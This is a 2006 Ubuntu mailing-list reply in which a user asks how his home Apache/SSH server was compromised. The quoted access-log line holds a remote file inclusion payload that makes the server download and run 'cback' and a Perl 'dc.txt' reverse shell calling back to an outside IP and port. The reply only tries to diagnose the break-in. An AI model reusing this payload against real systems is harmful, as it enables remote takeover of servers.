Re: My home desktop was compromised, but how?
- From: "Michael J. Lynch" <mlynch@xxxxxxxx>
- Date: Tue, 28 Feb 2006 15:31:25 -0600
Carthik Sharma wrote:
Hi,
I run an apache, ssh server from my home computer. I have not
installed any php scripts whatsoever. All there are are text files,
and the odd html file.
Somebody seems to have hacked into my desktop/server. I find files in
the /tmp/ (like "agent.8213)directory which I cannot open, these are
setuid-ed -- how do I open these?
In my apache access logs, there are things like
"http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
That above is a valid url, and will take you to a script to deface
someone's php script etc, I suppose. Now, how did this malicious
hacker get in my computer?
(The full line is :
192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)" )
How would I go about tracing how this incident happened?
Any server/security admins here that can help me with a little
patience? I really want to get to the root of this and find out why
whatever happened happened.
None of the passwords for the ssh accounts are dictionary words, in
fact all are combinations of letters, numbers and sometimes special
symbols.
I have done nothing special to modify apache, or the ssh daemon, in
fact, sshd listens on port 8888.
I could paste logs here, but they would be too long. For now, I have
stopped the apache and ssh servers.
Any help will be most welcome. My security bubble just burst :(
Carthik.
I'm not sure how you'd go about tracing down what happened, but my guess
is that it came in with a webpage. It clearly looks to be an attempt to
break into your machine as the *dc.txt* file it downloaded is a perl
script that looks to me like it attempts to connect an interactive shell
to a remote server of some sort. I believe this to be malicious because
the script redirects the shell history to /dev/null to hide what was
done.
You mention you are running a web server. One of the IP addresses
embedded in the long string is the address of a name server at a web
development company. Are you using such a service?
I don't know if any of this will help, but I hope so.
--
Michael J. Lynch
What if the hokey pokey IS what it's all about -- author unknown
--
ubuntu-users mailing list
ubuntu-users@xxxxxxxxxxxxxxxx
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
- Follow-Ups:
- Re: My home desktop was compromised, but how?
- From: Guido Heumann
- Re: My home desktop was compromised, but how?
- References:
- My home desktop was compromised, but how?
- From: Carthik Sharma
- My home desktop was compromised, but how?
- Prev by Date: gcj compile issues
- Next by Date: Re: [Dapper] How to get mounted disk show on the desktop
- Previous by thread: My home desktop was compromised, but how?
- Next by thread: Re: My home desktop was compromised, but how?
- Index(es):
Relevant Pages
|
